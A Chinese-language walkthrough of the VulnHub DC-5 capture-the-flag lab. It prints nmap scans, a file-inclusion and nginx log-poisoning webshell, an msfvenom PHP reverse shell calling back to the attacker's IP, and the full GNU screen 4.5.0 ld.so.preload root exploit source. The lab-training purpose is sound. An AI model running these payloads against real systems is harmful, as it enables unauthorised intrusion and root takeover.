渗透环境:DC5 https://www.vulnhub.com/entry/dc-5,314/
攻击机:192.168.168.128
靶机:ip地址未知, 已知ip与攻击机在同一网段下

信息收集

扫面存活主机

还是老规矩,nmap

1
nmap -sP 192.168.168.0/24

img

发现目标主机为192.168.168.133

扫描主机开放端口

1
nmap -A -p- 192.168.168.133

img

开放了80端口浏览器打开

img

渗透

只看到这个页面有注入的可能,试试
然后返回了thankyou.php过来

img

看看有没有存在sql注入,xss注入的可能
测试过,没反应
最后发现可以文件包含

1
?file=/etc/passwd

img

这里用日志注入的方法getshell

1
http://192.168.168.133/<?php @assert($_POST['test']);?>

查看日志文件位置

1
?file=/etc/nginx/nginx.conf

img

查看文件,用蚁剑连接

img

msf反弹shell

1
2
3
4
5
use exploit/multi/handler
set payload payload/php/meterpreter/reverse_tcp
set lhost 192.168.168.128 //攻击机ip
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.168.128 LPORT=4444 -f raw > shell.php //生成shell
run

将shell.php通过蚁剑上传到/tmp
访问对应shell.php

1
thankyou.php?file=/tmp/shell.php

img

连接成功

1
2
3
shell
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null

img

有个screen-4.5.0看看有没有漏洞可用

1
2
searchsploit screen 4.5.0
cd /usr/share/exploitdb/exploits/linux/local

img

把第一个文件通过蚁剑上传,看看能不能run
结果报错了
分析对应sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

根据上面逻辑得到3段代码,本地编译
libhax.c

1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
1
gcc -fPIC -shared -ldl -o libhax.so libhax.c

rootshell.c

1
2
3
4
5
6
7
8
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
1
gcc -o rootshell rootshell.c

run.sh

1
2
3
4
5
6
7
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

把run.sh, rootshell, libhax.so上传到/tmp文件夹中
执行run.sh文件

1
./run.sh

成功提权后

1
cat /root/thisistheflag.txt

img

获得flag,DC-5clear